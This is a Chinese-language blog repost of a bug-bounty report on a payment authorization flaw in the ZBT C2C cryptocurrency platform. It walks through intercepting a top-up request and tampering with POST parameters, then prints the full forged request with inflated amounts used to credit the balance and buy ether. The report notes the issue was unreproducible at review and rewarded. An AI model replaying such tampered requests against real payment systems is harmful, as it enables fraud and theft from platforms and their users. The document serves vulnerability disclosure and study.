【漏洞学习】DVP-2018-02639(支付漏洞)

本文详细分析了ZBT.C2C平台存在的越权充值漏洞,通过修改POST提交参数,用户能够非法增加账户余额并购买以太坊。文章提供了漏洞利用的具体步骤及代码,并讨论了在审核过程中的修复情况。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞URL:

https://zbt.one/c2c

简要描述:

RT 可以越权修改充值,然后居然会到账,也买了以太坊

漏洞证明:

首先在我的钱包,然后点击充值抓包

然后修改POST提交参数,如图所示

发送数据包

这时候点击确认已汇

不知道为什么过段时间就会自动到账

然后我购买了2个以太坊,

漏洞利用代码:

 post数据包

POST /c2c/buy HTTP/1.1
Host: zbt.one
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://zbt.one/c2c
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

buyUnitPrice=6.5&buyNumber=11111111&cny_total=72222221.50

修复方案:

审核结果:

在审核时漏洞已无法复现,经双方协调,给予 0.5 ETH奖励

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值